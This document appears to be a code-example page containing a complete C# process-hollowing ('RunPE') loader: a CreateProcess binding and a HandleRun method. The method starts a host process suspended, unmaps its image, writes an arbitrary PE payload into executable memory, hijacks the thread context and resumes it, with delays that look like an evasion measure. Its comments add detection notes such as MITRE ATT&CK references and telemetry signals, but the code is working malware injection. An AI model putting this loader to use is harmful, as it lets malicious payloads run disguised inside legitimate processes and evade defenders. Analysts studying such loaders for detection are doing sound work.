Пример #1
 /// <summary>
 /// P/Invoke binding to the Win32 <c>CreateProcess</c> API; the <c>[DllImport]</c> attribute is outside this excerpt.
 /// The visible caller (<c>HandleRun</c>) passes <c>creationFlags = 4u</c> (CREATE_SUSPENDED), so the child starts with its
 /// primary thread suspended — the precondition for the process-hollowing steps that follow. A suspended CreateProcess
 /// followed by remote memory writes and a thread-context change on the same child is the telemetry pattern to alert on.
 /// </summary>
 private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Loader.STARTUP_INFORMATION startupInfo, ref Loader.PROCESS_INFORMATION processInformation);
Пример #2
        /// <summary>
        /// Spawns <paramref name="path"/> suspended and replaces its in-memory image with the PE held in <paramref name="data"/>
        /// (process hollowing / "RunPE", MITRE ATT&amp;CK T1055.012), then resumes the primary thread.
        /// The call chain is CreateProcess(CREATE_SUSPENDED) → Get[Wow64]ThreadContext → ReadProcessMemory of the PEB image base
        /// → NtUnmapViewOfSection → VirtualAllocEx(RWX) → WriteProcessMemory (headers, sections, new image base)
        /// → Set[Wow64]ThreadContext → ResumeThread. For detection, that chain against a freshly created suspended child is the
        /// signal; the remote RWX allocation and the unmap of the child's own image are the highest-confidence steps.
        /// The hard-coded header offsets follow the 32-bit (PE32) layout, and the Wow64 context calls on 64-bit hosts are
        /// consistent with a 32-bit payload. No validation of <paramref name="data"/> (size, signature, section bounds) is done.
        /// </summary>
        /// <param name="path">Executable launched as the host process; it is quoted into the child's command line.</param>
        /// <param name="cmd">Optional arguments appended to the command line; ignored when null or empty.</param>
        /// <param name="data">Raw PE image to map into the child, read only through fixed header offsets.</param>
        /// <param name="compatible">When true, the fallback allocation at an arbitrary base (used when the preferred base is unavailable) is disabled.</param>
        /// <returns>True when every step succeeded and the thread was resumed; false on any failure, after the child has been killed.</returns>
        private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
        {
            int    num  = 0;
            string text = string.Format("\"{0}\"", path);

            Loader.STARTUP_INFORMATION targetProcessStartInfo = default(Loader.STARTUP_INFORMATION);
            Loader.PROCESS_INFORMATION targetProcessInfo      = default(Loader.PROCESS_INFORMATION);
            targetProcessStartInfo.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(Loader.STARTUP_INFORMATION)));
            bool result;

            try
            {
                if (!string.IsNullOrEmpty(cmd))
                {
                    text = text + " " + cmd;
                }
                // Stage 1: spawn the host; creationFlags 4u = CREATE_SUSPENDED, so the child never runs its own code. No handle
                // inheritance, no custom environment or working directory.
                if (!Loader.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref targetProcessStartInfo, ref targetProcessInfo))
                {
                    throw new Exception();
                }
                // Stage 2: payload header fields at fixed PE32 offsets — e_lfanew (DOS header +60) and the preferred image base.
                int   num2  = BitConverter.ToInt32(data, 60);
                int   num3  = BitConverter.ToInt32(data, num2 + 52);
                // x86 CONTEXT viewed as 179 ints; 65538 = 0x10002 = CONTEXT_INTEGER | CONTEXT_CONTROL selects which parts to read.
                int[] array = new int[179];
                array[0] = 65538;
                if (IntPtr.Size == 4)
                {
                    // the loader itself is a 32-bit process: plain context API on the child
                    if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    // the loader is 64-bit: the child is treated as a WOW64 (32-bit) process, hence the Wow64 context API
                    if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                // Stage 3: array[41] is the Ebx slot of the captured context; for a suspended primary thread it points at the
                // PEB, and PEB+8 (ImageBaseAddress) gives the address the host image is currently mapped at.
                int num4 = array[41];
                int num5 = 0;
                if (!Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, ref num5, 4, ref num))
                {
                    throw new Exception();
                }
                // Stage 4: only when the host already occupies the payload's preferred base is the original image unmapped.
                // NtUnmapViewOfSection on a child's own image base is rare in benign software and a strong detection hook.
                if (num3 == num5)
                {
                    if (Loader.NtUnmapViewOfSection(targetProcessInfo.ProcessHandle, num5) != 0)
                    {
                        throw new Exception();
                    }
                }

                // Fixed delays are inserted between every stage (5–10 s each, ~35 s in total); no functional dependency on
                // them is visible in this method. The long suspended-child lifetime itself is an observable anomaly.
                Loader.Sleep(5000);

                // Stage 5: allocate SizeOfImage bytes at the preferred base. 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE,
                // 64 = 0x40 = PAGE_EXECUTE_READWRITE — a remote RWX allocation is one of the strongest signals in this sequence.
                int  length     = BitConverter.ToInt32(data, num2 + 80);
                int  bufferSize = BitConverter.ToInt32(data, num2 + 84);
                bool flag       = false;
                int  num6       = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, num3, length, 12288, 64);
                if (!compatible && num6 == 0)
                {
                    // fallback: let the system choose the base; flag records that the image is not at its preferred address
                    flag = true;
                    num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, 0, length, 12288, 64);
                }
                if (num6 == 0)
                {
                    throw new Exception();
                }

                Loader.Sleep(5000);

                // Stage 6a: copy the PE headers (bufferSize = SizeOfHeaders) to the start of the new region.
                if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6, data, bufferSize, ref num))
                {
                    throw new Exception();
                }

                // Stage 6b: walk the 40-byte section headers (table starts at e_lfanew + 248 for PE32; count at e_lfanew + 6)
                // and copy each section's raw bytes to its virtual address inside the region. Sections with no raw data are skipped.
                int   num7 = num2 + 248;
                short num8 = BitConverter.ToInt16(data, num2 + 6);
                for (int i = 0; i <= (int)(num8 - 1); i++)
                {
                    int num9      = BitConverter.ToInt32(data, num7 + 12);
                    int num10     = BitConverter.ToInt32(data, num7 + 16);
                    int srcOffset = BitConverter.ToInt32(data, num7 + 20);
                    if (num10 != 0)
                    {
                        byte[] array2 = new byte[num10];
                        Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
                        if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6 + num9, array2, array2.Length, ref num))
                        {
                            throw new Exception();
                        }
                    }
                    num7 += 40;
                }

                Loader.Sleep(10000);

                // Stage 7: overwrite PEB.ImageBaseAddress with the new region so the loader in the child resolves against the payload.
                byte[] bytes = BitConverter.GetBytes(num6);
                if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, bytes, 4, ref num))
                {
                    throw new Exception();
                }
                // AddressOfEntryPoint (RVA) of the payload.
                int num11 = BitConverter.ToInt32(data, num2 + 40);
                if (flag)
                {
                    // when the fallback allocation was used, the entry point below is computed from the preferred base (num3),
                    // not from the address the image was actually written to
                    num6 = num3;
                }

                // Stage 8: store the entry point in the Eax slot (array[44]) and push the modified context back to the thread.
                array[44] = num6 + num11;
                if (IntPtr.Size == 4)
                {
                    if (!Loader.SetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    if (!Loader.Wow64SetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }

                Loader.Sleep(5000);

                // Reads 4 bytes from address 0 of the child; the return value and num5 are not used after this point.
                Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, 0x0, ref num5, 4, ref num);

                // Re-reads the thread context; 'array' is not consulted again, so this only acts as a failure check.
                if (IntPtr.Size == 4)
                {
                    // 32-bit loader process
                    if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    // 64-bit loader process, WOW64 child
                    if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }

                Loader.Sleep(5000);

                // Patch the PEB through the external PEB_Patch helper, passing the child's thread handle and this loader's own
                // on-disk path; what it rewrites is not visible in this excerpt.
                PEB_Patch.Apply(targetProcessInfo.ThreadHandle, Assembly.GetEntryAssembly().Location);

                Loader.Sleep(5000);

                // Stage 9: resume the primary thread; from here the child executes the mapped payload under the host's identity.
                if (Loader.ResumeThread(targetProcessInfo.ThreadHandle) == -1)
                {
                    throw new Exception();
                }
            }
            catch (Exception ex)
            {
                // Every failure above is a bare Exception, so only the stack trace is printed. The (suspended or partially
                // hollowed) child is then killed by PID and false is returned.
                Console.WriteLine(ex.ToString());
                Process processById = Process.GetProcessById(Convert.ToInt32(targetProcessInfo.ProcessId));
                if (processById != null)
                {
                    processById.Kill();
                }
                result = false;
                return(result);
            }
            result = true;
            return(result);
        }